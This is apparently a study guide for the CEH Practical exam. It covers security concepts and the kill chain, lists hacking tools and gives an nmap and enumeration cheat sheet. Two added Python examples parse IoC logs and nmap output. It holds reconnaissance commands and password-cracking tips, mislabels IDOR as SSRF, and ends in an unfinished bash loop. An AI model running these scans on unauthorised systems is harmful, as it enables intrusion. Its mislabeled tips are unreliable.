CEH-Practical TIPS

Contents

View all the content: https://github.com/TheCyberpunker/CEH-Practical-Notes

What is an Ethical Hacker?

The Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods as a Hacker. Hacking is a felony in some countries. When it is done by request and under a contract between an Ethical Hacker and an organization, it is legal. The most important point is that an Ethical Hacker has authorization to probe the target.

A Certified Ethical Hacker is a skilled professional who understands and knows how to look for the weaknesses and vulnerabilities in target systems and uses the same knowledge and tools as a malicious hacker.

What is Information Security?

Information security refers to the protection or safeguarding of information and information systems that use, store, and transmit information from unauthorized access, disclosure, alteration and destruction. Information is a critical asset that organizations must secure. If sensitive information falls into the wrong hands, then the respective organization may suffer huge losses in terms of finances, brand reputation, customers, or in other ways.

Elements of Information Security

Information security is the state of the well-being of information and infrastructure in which the possibility of the theft, tampering, or disruption of information and services is kept low or tolerable. It relies on five major elements: confidentiality, integrity, availability, authenticity and non-repudiation.

  • #### Confidentiality
    Confidentiality is the assurance that the information is accessible only to authorized users.
  • #### Integrity
    Integrity is the trustworthiness of data or resources in the prevention of improper and unauthorized changes – the assurance that information is sufficiently accurate for its purpose.
  • #### Availability
    Availability is the assurance that the systems responsible for delivering, storing and processing information are accessible when required by authorized users.
  • #### Authenticity
    Authenticity refers to the characteristic of communication, documents, or any data that ensures the quality of being genuine or uncorrupted. The major role of authentication is to confirm that a user is genuine.
  • #### Non-Repudiation
    Non-repudiation is a way to guarantee that the sender of a message cannot later deny having sent the message and that the recipient cannot deny having received the message. Individuals and organizations use digital signatures to ensure non-repudiation.

Classification of Attacks

According to IATF (Information Assurance Technical Framework), security attacks are classified into five categories: passive, active, close-in, insider and distribution.

  • #### Passive Attacks
    • Passive attacks do not tamper with the data and involve intercepting and monitoring network traffic and data flow on the target network.
    • Examples include sniffing and eavesdropping (listening covertly).
  • #### Active Attacks
    • Active attacks tamper with the data in transit or disrupt the communication or services between the systems to bypass or break into secured systems.
    • Examples include DoS, Man-in-the-Middle, session hijacking, and SQL injection.
  • #### Close-in Attacks
    • Close-in attacks are performed when the attacker is in close physical proximity with the target system or network in order to gather, modify, or disrupt access to information.
    • Examples include social engineering such as eavesdropping, shoulder surfing, and dumpster diving (searching through discarded material).
  • #### Insider Attacks
    • Insider attacks involve using privileged access to violate rules or intentionally cause a threat to the organization’s information or information systems.
    • Examples include theft of physical devices and planting keyloggers, backdoors, and malware.
  • #### Distribution Attacks
    • Distribution attacks occur when attackers tamper with hardware or software prior to installation.
    • Examples include tampering with the hardware or software at its source or in transit.

Cyber Kill Chain Methodology

The cyber kill chain is an efficient and effective way of illustrating how an adversary can attack the target organization.

Methodology:

  • #### Reconnaissance:
    Gather data on the target to probe for weak points.
  • #### Weaponization:
    Create a deliverable malicious payload using an exploit and a backdoor.
  • #### Delivery:
    Send weaponized bundle to the victim using email, USB…
  • #### Exploitation:
    Exploit a vulnerability by executing code on the victim’s system.
  • #### Installation:
    Install malware on the target system.
  • #### Command and Control:
    Create a command and control channel to communicate and pass data back and forth.
  • #### Actions on Objectives:
    Perform actions to achieve intended objectives and goals.

Tactics, Techniques, and Procedures (TTPs)

The terms tactics, techniques, and procedures refer to the patterns of activities and methods associated with specific threat actors or groups of threat actors.

  • #### Tactics:
    Tactics are the guidelines that describe the way an attacker or advanced persistent threat (APT) performs the attack from beginning to end.
  • #### Techniques:
    Techniques are the technical methods used by an attacker to achieve intermediate results during the attack.
  • #### Procedures:
    Procedures are organizational approaches that threat actors follow to launch an attack.

Adversary Behavioral Identification

Adversary behavioral identification involves the identification of the common methods or techniques followed by an adversary to launch attacks to penetrate an organization’s network.

  • #### Internal Reconnaissance
    Once the adversary is inside the target network, they follow various techniques and methods to carry out internal reconnaissance.
  • #### Use of PowerShell
    PowerShell can be used by an adversary as a tool for automating data exfiltration and launching further attacks.
  • #### Unspecified Proxy Activities
    An adversary can create and configure multiple domains pointing to the same host, thus, allowing an adversary to switch quickly between the domains to avoid detection.
  • #### Use of Command-Line Interface
    On gaining access to the target system, an adversary can make use of the command-line interface to interact with the target system, browse the files, read file content, modify file content, create new accounts, connect to the remote system, and download and install malicious code.
  • #### HTTP User Agent
    In HTTP-based communication, the server identifies the connected HTTP client using the user agent field.
  • #### Command and Control Server
    Adversaries use command and control servers to communicate remotely with compromised systems through an encrypted session.
  • #### Use of DNS Tunneling
    Adversaries use DNS tunneling to obfuscate malicious traffic in the legitimate traffic carried by common protocols used in the network.
  • #### Use of Web Shell
    An adversary uses a web shell to manipulate the web server by creating a shell within a website; it allows an adversary to gain remote access to the functionalities of a server.
  • #### Data Staging
    After successful penetration into a target’s network, the adversary uses data staging techniques to collect and combine as much data as possible.

Indicators of Compromise (IoCs)

Indicators of compromise are the clues, artifacts, and pieces of forensic data that are found on a network or operating system of an organization that indicate a potential intrusion or malicious activity in the organization’s infrastructure.
Cyber Threats are continuously evolving with the newer TTPs adapted based on the vulnerabilities of the target organization. Security professionals must perform continuous monitoring of IoCs to effectively and efficiently detect and respond to evolving cyber threats.

Categories of Indicators of Compromise

Cybersecurity professionals must have proper knowledge of the various possible threat actors and their tactics related to cyber threats, most often expressed as IoCs. For this purpose, IoCs are divided into four categories:

  • #### Email Indicators
    Attackers usually prefer email services to send malicious data to the target organization or individual.
  • #### Network Indicators
    Network indicators are useful for command and controls, malware delivery, and identifying details about the operating system, browser type, and other computer specific information.
  • #### Host-Based indicators
    Host-Based indicators are found by performing an analysis of the infected system within the organizational network.
  • #### Behavioral Indicators
    Generally, typical IoCs are useful for identifying indications of intrusion, such as malicious IP addresses, virus signatures, MD5 hash, and domain names.
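The IoC categories above, and the HTTP user agent and DNS tunneling behaviors listed under Adversary Behavioral Identification, are easiest to understand as matching rules run over logs. The following is an added example (not part of the CEH notes or any EC-Council material): it checks constructed log lines against a small, constructed IoC set keyed by the four categories, and adds one behavioral heuristic for DNS tunneling based on label length and entropy. Every indicator value, IP, domain, hash and log line is a placeholder made up for the example; the log format (`type key=value ...`) is also an assumption, not a real sensor format.

```python
"""Added example: match constructed log lines against an IoC set grouped by the
page's four categories (email, network, host, behavioral). All indicator values
and log lines are constructed placeholders, not real indicators."""
import math
import shlex
from collections import Counter

# Constructed IoC set, keyed by category. None of these values is a real indicator.
IOCS = {
    "email": {"from": {"billing@invoice-portal.test"}},
    "network": {
        "ip": {"203.0.113.45"},
        "domain": {"cdn-update.example"},
        "user_agent": {"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"},
    },
    "host": {"sha256": {"d7b2e1b9f2ab6b6b8f4d0b0ce0c2a1a7f3e9d4c5b6a7980716253443526170ff"}},
}

# Constructed log lines in a simple "<type> key=value ..." format (assumed format).
SAMPLE_LOGS = [
    "dns client=10.0.0.5 qname=www.example.org",
    "dns client=10.0.0.5 qname=3d2a9f0b7c1e6a4b8d0f2e9c1a7b3d5f6e8a0c2b4d6f8a1c3e5b7d9f1a3c5e7b.tunnel.example",
    'http client=10.0.0.7 dst=203.0.113.45 ua="Mozilla/5.0 (X11; Linux x86_64)"',
    'http client=10.0.0.7 dst=198.51.100.9 ua="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    "proc host=ws01 image=update.exe sha256=d7b2e1b9f2ab6b6b8f4d0b0ce0c2a1a7f3e9d4c5b6a7980716253443526170ff",
    'mail from=billing@invoice-portal.test to=cfo@corp.example subject="Overdue invoice"',
    'http client=10.0.0.9 dst=cdn-update.example ua="curl/8.0"',
]

MAX_LABEL_LEN = 40   # legitimate hostnames rarely need a single label this long
MIN_ENTROPY = 3.5    # bits per character; encoded payload data scores high, words score low


def parse_line(line):
    """Split one log line into a dict; shlex keeps quoted values (user agents) intact."""
    tokens = shlex.split(line)
    fields = {"type": tokens[0]}
    for token in tokens[1:]:
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def shannon_entropy(text):
    """Shannon entropy of a string in bits per character."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def dns_tunnel_suspect(qname):
    """Heuristic: tunnelled data rides in long or high-entropy labels of the query name."""
    labels = qname.lower().rstrip(".").split(".")
    longest = max(labels, key=len)
    return len(longest) > MAX_LABEL_LEN or (
        len(longest) >= 20 and shannon_entropy(longest) >= MIN_ENTROPY
    )


def analyze(lines):
    """Return (category, reason, line) for every line that matches an indicator."""
    findings = []
    for line in lines:
        f = parse_line(line)
        kind = f["type"]
        if kind == "mail" and f.get("from") in IOCS["email"]["from"]:
            findings.append(("email", "sender matches IoC", line))
        elif kind == "http":
            if f.get("dst") in IOCS["network"]["ip"] | IOCS["network"]["domain"]:
                findings.append(("network", "destination matches IoC", line))
            if f.get("ua") in IOCS["network"]["user_agent"]:
                findings.append(("network", "user agent matches IoC", line))
        elif kind == "proc" and f.get("sha256") in IOCS["host"]["sha256"]:
            findings.append(("host", "file hash matches IoC", line))
        elif kind == "dns" and dns_tunnel_suspect(f.get("qname", "")):
            findings.append(("behavioral", "possible DNS tunnelling", line))
    return findings


if __name__ == "__main__":
    for category, reason, line in analyze(SAMPLE_LOGS):
        print(f"[{category}] {reason}: {line}")
```

The first three categories are exact matches and only fire on indicators you already know; the behavioral check is the one that can catch something new, and it is also the one that produces false positives (CDN and anti-spam lookups legitimately use long labels), so the thresholds are meant to be tuned against your own DNS baseline rather than used as-is.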

Hacking Concepts

Hacking in the field of computer security refers to exploiting system vulnerabilities and compromising security controls to gain unauthorized or inappropriate access to system resources.

Who is a Hacker?

  • An intelligent individual with excellent computer skills who can create and explore computer software and hardware.
  • For some hackers, hacking is a hobby to see how many computers or networks they can compromise.
  • Some hackers’ intentions can be either to gain knowledge or to probe systems and do illegal things.

Hackers Classes

Hackers usually fall into one of the following categories, according to their activities:

  • Black Hats: Illegal or malicious purposes.
  • White Hats: Defensive or for good purposes.
  • Gray Hats: Work on both sides, offensively and defensively.
  • Suicide Hackers: Do not care about the consequences of their actions.
  • Script Kiddies: People who use tools made by real hackers (they are fake hackers).
  • Cyber Terrorists: Motivated by religious or political beliefs.
  • State-Sponsored Hackers: Contracted by governments to hack other governments.
  • Hacktivists: Hackers who break into government or corporate computer systems as an act of protest.

Hacking Phases

In general, there are five phases of hacking:

  • #### Reconnaissance:
    Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack.
    • Reconnaissance Types:
      • Active: Involves direct interaction with the target system, using tools to detect open ports, hosts, router locations, VoIP calls, and more.
      • Passive: Does not interact with the target directly; relies on publicly available information (OSINT).
  • #### Scanning:
    Scanning is the phase immediately preceding the attack. The attacker uses the details gathered during reconnaissance to scan the network for specific information.
    • Pre-attack phase: Scanning refers to the pre-attack phase when the attacker scans the network for specific information based on information gathered during reconnaissance.
    • Port Scanner: Scanning can include the use of dialers, port scanners, network mappers, ping tools, and vulnerability scanners.
    • Extract Information: Attackers extract information such as live machines, ports, port status, OS details, device type, and system uptime to launch an attack.
  • #### Gaining Access:
    • Gaining access refers to the point where the attacker obtains access to the operating system or applications on the target computer or network.
    • The attacker can gain access at the operating system, application, or network levels.
    • Can escalate privileges to obtain complete control of the system. In this process, the target’s connected intermediate systems are also compromised.
    • Examples include password cracking, buffer overflows, denial of service, and session hijacking.
  • #### Maintaining Access:
    • Maintaining access refers to the phase when the attacker tries to retain their ownership on the system.
    • Attackers may prevent the system from being owned by other attackers by securing their exclusive access with backdoors, rootkits, or trojans.
    • Attackers can upload, download, or manipulate data, applications, and configurations on the owned system.
    • Attackers use the compromised system to launch further attacks.
  • #### Clearing Tracks:
    • Clearing tracks refers to the activities carried out by an attacker to hide malicious acts.
    • The attacker’s intentions include obtaining continuing access to the victim’s system, remaining unnoticed and uncaught, and deleting evidence that might lead to their prosecution.
    • The attacker overwrites the server, system, and application logs to avoid suspicion.

Why Ethical Hacking is Necessary

Ethical hacking is necessary as it allows for counter attacks against malicious hackers by anticipating the methods used to break into the system.

  • To prevent hackers from gaining access to the organization’s information systems.
  • To uncover vulnerabilities in systems and explore their potential as a security risk.
  • To analyze and strengthen an organization’s security posture, including policies, network protection infrastructure, and end-user practices.
  • To provide adequate preventive measures in order to avoid security breaches.
  • To help safeguard customer data.
  • To enhance security awareness at all levels in a business.

Scope and Limitations of Ethical Hacking

Scope:
  • Ethical hacking is a crucial component of risk assessment, auditing, counter fraud, and information systems security best practices.
  • It is used to identify risk and highlight remedial actions. It also reduces ICT (Information and Communications Technology) cost by resolving vulnerabilities.
Limitations:
  • Unless the businesses already know what they are looking for and why they are hiring an outside vendor to hack systems in the first place, chances are there would not be much to gain from the experience.
  • An ethical hacker can only help the organization to better understand its security system; it is up to the organization to place the right safeguards on the network.

Skills of an Ethical Hacker

It is essential for an ethical hacker to acquire the knowledge and skills to become an expert hacker and to use this knowledge in a lawful manner. The technical and non-technical skills to be a good ethical hacker are discussed below:

  • #### Technical Skills:
  • In-depth knowledge of major operating environments, such as Windows, Unix, Linux, and Macintosh.
  • In-depth knowledge of networking concepts, technologies, and related hardware and software.
  • A computer expert adept at technical domains.
  • The knowledge of security areas and related issues.
  • High technical knowledge of how to launch sophisticated attacks.
  • #### Non-Technical Skills
  • The ability to quickly learn and adapt new technologies.
  • A strong work ethic and good problem solving and communication skills.
  • Commitment to an organization’s security policies.
  • An awareness of local standards and laws.

Information Security Controls

Information security controls prevent the occurrence of unwanted events and reduce risk to the organization’s information assets. The basic security concepts critical to information on the internet are the CIA triad: confidentiality, integrity, and availability. The concepts related to the persons accessing the information are authentication, authorization, and non-repudiation.

Information Assurance (IA)

  • IA refers to the assurance that the integrity, availability, confidentiality, and authenticity of information and information systems is protected during the usage, processing, storage, and transmission of information.
  • Some of the processes that help in achieving information assurance include:
  • Developing local policy, process, and guidance.
  • Designing network and user authentication strategies.
  • Identifying network vulnerabilities and threats.
  • Identifying problem and resource requirements.
  • Creating plans for identified resource requirements.
  • Applying appropriate information assurance controls.
  • Performing certification and accreditation.
  • Providing information assurance training.

Defense-in-Depth

  • Defense-in-depth is a security strategy in which several protection layers are placed throughout an information system.
  • It helps to prevent direct attacks against the system and its data because a break in one layer only leads the attacker to the next layer.

What is Risk?

Risk refers to the degree of uncertainty or expectation of potential damage that an adverse event may cause to the system or its resources, under specified conditions.

  • #### Risk Level
    Risk level is an assessment of the resulting impact on the network.
  • #### Risk Matrix
    The risk matrix scales the risk occurrence or likelihood probability, along with its consequences or impact.
  • #### Risk Management
    Risk management is the process of reducing and maintaining risk at an acceptable level by means of a well-defined and actively employed security program.
  • #### Risk Management Phases:
    • #### Risk Identification:
      Identifies the sources, causes, consequences, and other details of the internal and external risks affecting the security of the organization.
    • #### Risk Assessment:
      Assesses the organization's risk and provides an estimate of the likelihood and impact of the risk.
    • #### Risk Treatment:
      Selects and implements appropriate controls for the identified risks.
    • #### Risk Tracking:
      Ensures appropriate controls are implemented to handle known risks and calculates the chances of a new risk occurring.
    • #### Risk Review:
      Evaluates the performance of the implemented risk management strategies.

Cyber Threat Intelligence

According to the Oxford dictionary, a threat is defined as “the possibility of a malicious attempt to damage or disrupt a computer network or system.” A threat is a potential occurrence of an undesired event that can eventually damage and interrupt the operational and functional activities of an organization. A threat can affect the integrity and availability factors of an organization. The impact of threats is significant and may affect the state of the physical IT assets in an organization. The existence of threats may be accidental, intentional, or due to the impact of some action.

Types of Threat Intelligence

Threat intelligence is contextual information that describes threats and guides organizations in making various business decisions. It is extracted from a huge collection of sources and information.

  • #### Strategic:
    High level information on changing risks.
    Consumed by high level executives and management.
  • #### Tactical:
    Information on attacker’s TTPs.
    Consumed by IT service and SOC Managers, administrators.
  • #### Operational:
    Information on a specific incoming attack.
    Consumed by security managers and network defenders.
  • #### Technical
    Information on specific indicators of compromise.
    Consumed by SOC staff and IR teams.

Threat Modeling

Threat modeling is a risk assessment approach for analyzing the security of an application by capturing, organizing, and analyzing all the information that affects the security of an application.

Threat Modeling Process

  • #### Identify Security Objectives:
    Helps to determine how much effort needs to be put toward subsequent steps
  • #### Application Overview:
    Identify the components, data flows, and trust boundaries
  • #### Decompose the Application:
    Helps to find more relevant and more detailed threats
  • #### Identify Threats:
    Identify threats relevant to the control scenario and context using the information obtained in steps 2 and 3
  • #### Identify Vulnerabilities:
    Identify weaknesses related to the threats found using vulnerability categories

Incident Management

Incident management is a set of defined processes to identify, analyze, prioritize, and resolve security incidents to restore the system to normal service operations as soon as possible, and prevent recurrence of the incident.

Incident management includes the following:

  • Vulnerability analysis
  • Artifact analysis
  • Security awareness training
  • Intrusion detection
  • Public or technology monitoring

The incident management process is designed to:

  • Improve service quality
  • Resolve problems proactively
  • Reduce the impact of incidents on an organization or its business
  • Meet service availability requirements
  • Increase staff efficiency and productivity
  • Improve user and customer satisfaction
  • Assist in handling future incidents

Incident Handling and Response

Incident handling and response (IH&R) is the process of taking organized and careful steps when reacting to a security incident or cyber attack. It is a set of procedures, actions, and measures taken against an unexpected event occurrence. It involves logging, recording, and resolving incidents that take place in the organization. It notes the incident, when it occurred, its impact, and its cause.

Steps involved in the IH&R process:

  • #### Preparation:
    The preparation phase includes performing an audit of resources and assets to determine the purpose of security and define the rules, policies and procedures that drive the IH&R process.
  • #### Incident recording and assignment:
    In this phase, the initial reporting and recording of the incident take place.
  • #### Incident Triage:
    In this phase, the identified security incidents are analyzed, validated, categorized, and prioritized.
  • #### Notification:
    In the notification phase, the IH&R team informs various stakeholders, including management, third-party vendors, and clients, about the identified incident.
  • #### Containment:
    This phase helps to prevent the spread of infection to other organizational assets, preventing additional damage.
  • #### Evidence gathering and forensic analysis:
    In this phase, the IH&R team accumulates all possible evidence related to the incident and submits it to the forensic department for investigation.
  • #### Eradication:
    In the eradication phase, the IH&R team removes or eliminates the root cause of the incident and closes all the attack vectors to prevent similar incidents in the future.
  • #### Recovery:
    After eliminating the causes of the incident, the IH&R team restores the affected systems, services, resources, and data through recovery.
  • #### Post-incident Activities:
    Once the process is complete, the security incident requires additional review and analysis before closing the matter.
    • Incident documentation
    • Incident impact assessment
    • Reviewing and revising policies
    • Closing the investigation
    • Incident disclosure

Role of AI and ML in Cyber Security

Machine learning (ML) and Artificial intelligence (AI) are now popularly used across various industries and applications due to the increase in computing power, data collection, and storage capabilities.

What are AI and ML?

Artificial Intelligence: a huge amount of collected data is fed into the AI, which processes and analyzes it to understand its details and trends.
Machine Learning is a branch of artificial intelligence (AI) that gives systems the ability to learn on their own without explicit programming.
There are two types of ML classification techniques:

  • #### Supervised learning:
    Supervised learning uses algorithms that input a set of labeled training data to attempt to learn the differences between the given labels.
  • #### Unsupervised learning:
    Unsupervised learning makes use of algorithms that input unlabeled training data to attempt to deduce all the categories without guidance.

Information Security Laws and Standards

Laws are a system of rules and guidelines that are enforced by a particular country or community to govern behavior. A Standard is a “document established by consensus and approved by a recognized body that provides, for common and repeated use, rules, guidelines, or characteristics for activities or their results, aimed at the achievement of the optimum degree of order in a given context”.

Payment Card Industry Data Security Standard (PCI DSS)

Source: https://www.pcisecuritystandards.org
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards. This standard offers robust and comprehensive standards and supporting materials to enhance payment card data security. These materials include a framework of specifications, tools, measurements, and support resources to help organizations ensure the safe handling of cardholder information.

PCI Data Security Standard – High Level Overview

  • #### Build and Maintain a Secure Network:
  • Install and maintain a firewall configuration to protect cardholder data.
  • Do not use vendor-supplied defaults for system passwords and other security parameters
  • #### Protect Cardholder Data:
  • Protect stored cardholder data
  • Encrypt transmission of cardholder data across open, public networks
  • #### Maintain a Vulnerability Management Program:
  • Use and regularly update anti-virus software or programs
  • Develop and maintain secure systems and applications
  • #### Implement Strong Access Control Measures:
  • Restrict access to cardholder data by business need to know
  • Assign a unique ID to each person with computer access
  • Restrict physical access to cardholder data
  • #### Regularly Monitor and Test Networks:
  • Track and monitor all access to network resources and cardholder data
  • Regularly test security systems and processes
  • #### Maintain an Information Security Policy:
  • Maintain a policy that addresses information security for all personnel

ISO/IEC 27001:2013

ISO/IEC 27001:2013 specifies the requirements for establishing, implementing, maintaining, and continually improving an information security management system within the context of an organization. It includes requirements for the assessment and treatment of information security risks tailored to the needs of the organization.

The regulation is intended to be suitable for several different uses, including:

  • Use within organizations to formulate security requirements and objectives
  • Use within organizations as a way to ensure that security risks are cost-effectively managed
  • Use within organizations to ensure compliance with laws and regulations
  • Defining new information security management processes
  • Identifying and clarifying existing information security management processes
  • Use by the management of organizations to determine the status of information security management activities
  • Implementing business-enabling information security
  • Use by organizations to provide relevant information about information security to customers

Health Insurance Portability and Accountability Act (HIPAA)

The HIPAA Privacy Rule provides federal protections for the individually identifiable health information held by covered entities and their business associates and gives patients an array of rights to that information. At the same time, the Privacy Rule permits the disclosure of health information needed for patient care and other necessary purposes.

The Office of Civil Rights implemented HIPAA’s Administrative Simplification Statute and Rules, as discussed below:

  • #### Electronic Transactions and Code Set Standards:
    Transactions are electronic exchanges involving the transfer of information between two parties for specific purposes. The Health Insurance Portability and Accountability Act of 1996 (HIPAA) designated certain types of organizations as covered entities, including health plans, health care clearinghouses, and certain health care providers.
  • #### Privacy Rule
    The HIPAA Privacy Rule establishes national standards to protect people’s medical records and other personal health information and applies to health plans, health care clearinghouses, and health care providers that conduct certain health care transactions electronically.
  • #### Security Rule
    The HIPAA Security Rule establishes national standards to protect individuals’ electronic personal health information that is created, received, used, or maintained by a covered entity.
  • #### Employer Identifier Standard
    HIPAA requires that each employer has a standard national number that identifies them on standard transactions.
  • #### National Provider Identifier Standard (NPI)
    The National Provider Identifier (NPI) is a HIPAA Administrative Simplification Standard. The NPI is a unique identification number assigned to covered health care providers.
  • #### Enforcement Rule
    The HIPAA Enforcement Rule contains provisions relating to compliance and investigation, as well as the imposition of civil monetary penalties for violations of the HIPAA Administrative Simplification Rules and procedures for hearings.

Sarbanes Oxley Act (SOX)

Source: https://www.sec.gov
Enacted in 2002, the Sarbanes-Oxley Act aims to protect the public and investors by increasing the accuracy and reliability of corporate disclosures. This act does not explain how an organization must store records but describes the records that organizations must store and the duration of their storage. The Act mandated several reforms to enhance corporate responsibility, enhance financial disclosures, and combat corporate and accounting fraud.

The Digital Millennium Copyright Act (DMCA)

Source: https://www.copyright.gov
The DMCA is an American copyright law that implements two 1996 treaties from the World Intellectual Property Organization (WIPO): the WIPO Copyright Treaty and the WIPO Performances and Phonograms Treaty. In order to implement US treaty obligations, the DMCA defines legal prohibitions against circumvention of the technological protection measures employed by copyright owners to protect their works, and against the removal or alteration of copyright management information.

Cyber Law in Different Countries

Cyberlaw or Internet law refers to any laws that deal with protecting the Internet and other online communication technologies. Cyberlaw covers topics such as Internet access and usage, privacy, freedom of expression, and jurisdiction. Cyber laws provide an assurance of the integrity, security, privacy, and confidentiality of information in both governmental and private organizations. These laws have become prominent due to the increase in Internet usage around the world. Cyber laws vary by jurisdiction and country, so implementing them is quite challenging. Violating these laws results in punishments ranging from fines to imprisonment.

Commands, tips and tools

Commands

  •  HashCalc computes the hash of a file
  •  rcalc at the console level
  •  Dump the database: sqlmap
  •  TCP scan with nmap; TCP gives more info
  •  Scan pcap files or the network: wireshark, tshark

Tips

  •  Banner grabbing
  •  Learn about rainbow tables and hashcat
  •  unicornscan OS discovery
  •  SNMP with nmap and msfconsole
  •  Use of Nikto on Parrot and Nessus on Windows
  •  Learn TCP, UDP and ARP scanning
  •  Know which machines are on the network
  •  Scanning via ICMP
  •  Scan the network, check the open ports with nmap, and filter the ports
  •  You are given a hash: what is the password stored in a given place? (Compare hashes with hash-identifier)
  •  Dictionary: rockyou, but also SecLists
  •  Rainbow tables
  •  MD5 checksum
  •  SSRF by changing id=1 to id=2
  •  Wireshark: filter by POST method
  •  IPv6 enumeration

Tools

  •  wireshark
  •  hash-identifier, hashid (to identify the hash type)
  •  netdiscover (to view or map the network; Parrot 🦜)
  •  nmap (IPs, OS, versions, ports)
  •  John the Ripper (to crack the password behind a hash)
  •  wpscan (WordPress enumeration: users, plugins, brute force …)
  •  cewl (to build wordlists from the text of the target page)
  •  sqlmap (to enumerate databases)
  •  stego, hydra
  •  Nikto
  •  Veracrypt
  •  HashCalc
  •  rcalc
  •  Dirb
  •  Steghide
  •  Searchsploit
  •  Hashcat
  •  rainbow-tables
  •  metasploit
  •  metasploit android
  •  stego windows
  •  wireshark filters
  •  wordpress

CEH Practical Notes

  • Footprinting
  • Scanning
  • Enumeration
  • Vulnerability Analysis
  • System Hacking Gaining Access
  • Cracking passwords
  • Vulnerability Exploitation Escalating Privileges Maintaining Access
  • Executing Applications
  • Hiding Files Clearing Logs
  • Covering Tracks

Online Resources

Enumeration

host enumeration

host and service enumeration

// discover devices inside the network on eth0
netdiscover -i eth0
nmap -sn 10.10.10.0/24 // ping sweep (host discovery only, no port scan)
// enumeration
nbtstat -A 10.10.10.10 // NetBIOS enumeration (Windows)
snmp-check 10.10.10.10 // enumerate users, processes, shares, etc. over SNMP (Parrot)
enum4linux 10.10.10.10 // SMB/NetBIOS enumeration

sudo nmap -vv -p 1-1000 -sC -A 10.10.10.10 -oN nmap_scan
nmap -p- -sS --min-rate 10000 -Pn -n 10.10.10
nmap -6 www.scanme.com // scan IPv6
nmap -sC -sV -vvv -T5 -p 80,21,2222 10.10.10
sudo nmap -v -sV -sC <ip>
nmap -Pn -sS -n 10.10.. -T4 -oN nmap_scan // [preferred] fast scan
nmap -v -p- -sV -sC -T4 10.10 -oN nmap_scan // all TCP ports with versions and scripts
sudo nmap -p- -Pn -vvv -sS 10.10.. -oN nmap_scan
nmap -sS -sV -A -O -Pn <ip>
nmap -sV -sT -sU -A 10.10.. -oN nmap_scan // TCP connect + UDP scan
sudo nmap -p- 10.10.. --open -oG nmap/AllPorts -vvv -Pn -n -sS
sudo nmap -p22,80 -sV -sC -Pn -n 10.10.. -oN nmap/openports -vvv
nmap -sV -p 22,443 10.10../24 // scan my /24 network
nmap -sU -p 161 -sV -sC 10.10.. // UDP scan (SNMP)
nmap -A --min-rate=5000 --max-retries=5 10.10.. // optimize scan time
nmap -Pn -sS -A -oX test 10.10.10.0/24 // scan the network/subnet and save the result as XML

// scripts
nmap -sU -p 161 --script "snmp-*" 10.10.. // SNMP NSE scripts: extract users, processes, etc. via port 161

-PR = ARP ping scan
-PE = ICMP echo ping scan
-PU = UDP ping scan
-oX = save as XML
-vv = very verbose
-p = ports
-p- = all ports (1-65535)
-sC = default scripts
-sV = probe open ports to determine service/version info
-A = aggressive scan (OS detection, version detection, script scanning and traceroute)
-O = OS detection
-oN = save in normal (human-readable) format
-oG = save in grepable format
-oA = save in all three formats at once
-sS = SYN scan; less intrusive because it never completes the TCP handshake
-sT = TCP connect scan
-sU = UDP port scan
-n = do not resolve DNS names
-Pn = skip host discovery (treat every host as up, no ping)
--open = show only open ports
-T<0-5> = timing template (T4 = aggressive, faster)
--max-retries = max probe retransmissions (default 10; 1 speeds up a scan)

// My methodology
nmap -sV -sC 10.10.10.x # top 1000 ports
nmap -sC -sV -v -oN nmap.txt <ip>
masscan -e tun0 -p1-65535 --rate=1000 <ip>
sudo nmap -sU -sV -A -T4 -v -oN udp.txt <ip>

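The all-ports scan with --open -oG above feeds the targeted -p22,80 -sV -sC scan that follows it. The parser below (an added example, not part of the notes) reads that grepable output into a port list for the second scan and, from the defender's side, reports open ports outside an expected baseline; the -oG text is a constructed sample in nmap's real field layout.

```python
"""Parse nmap grepable (-oG) output: {host: [(port, proto, service, version)]}.
The sample below is constructed to mimic `nmap -p- --open -oG ...` output
(tab-separated fields; each port entry is port/state/proto/owner/service/rpc/version/)."""

SAMPLE_OG = (
    "# Nmap 7.93 scan initiated as: nmap -p- --open -oG - 10.10.10.10\n"
    "Host: 10.10.10.10 ()\tStatus: Up\n"
    "Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu//, "
    "80/open/tcp//http//Apache httpd 2.4.29//, 3306/filtered/tcp//mysql///"
    "\tIgnored State: closed (65532)\n"
    "# Nmap done: 1 IP address (1 host up) scanned in 12.3 seconds\n"
)


def parse_grepable(text):
    """Return {host: [(port, proto, service, version), ...]} for open ports only."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # skip the '# Nmap ...' comment lines
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        host = fields["Host"].split()[0]  # drop the '(hostname)' part
        entries = hosts.setdefault(host, [])
        for entry in fields.get("Ports", "").split(", "):
            if not entry:
                continue
            # pad so short entries (no rpc/version text) still unpack to 7 fields
            parts = (entry.split("/") + [""] * 7)[:7]
            port, state, proto, _owner, service, _rpc, version = parts
            if state == "open":
                entries.append((int(port), proto, service, version))
    return hosts


def open_ports(hosts, host):
    """Comma-separated list ready for the targeted scan: nmap -p22,80 -sV -sC ..."""
    return ",".join(str(p) for p, _, _, _ in hosts.get(host, []))


def unexpected(hosts, baseline):
    """Defender's check: open ports that are not in the allowlist {host: {ports}}."""
    return {h: [p for p, _, _, _ in entries if p not in baseline.get(h, set())]
            for h, entries in hosts.items()}


if __name__ == "__main__":
    found = parse_grepable(SAMPLE_OG)
    print(open_ports(found, "10.10.10.10"))            # 22,80
    print(unexpected(found, {"10.10.10.10": {22}}))    # {'10.10.10.10': [80]}
```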
default ports

port   service
3306   mysql (--script mysql-info,mysql-enum)
3389   rdp (remote desktop)
25     smtp (mail)
80     http
443    https
20     ftp (ftp-data; the control channel is on 21)
23     telnet
143    imap
22     ssh
53     dns

Common DB ports

port   database
1521   oracle

#!/usr/bin/bash
# generate one full TCP scan command per live host: reads live_hosts.txt, appends to cmd_tcp.txt
# $service is an optional variable with extra nmap options (empty is fine)
while read -r ip; do
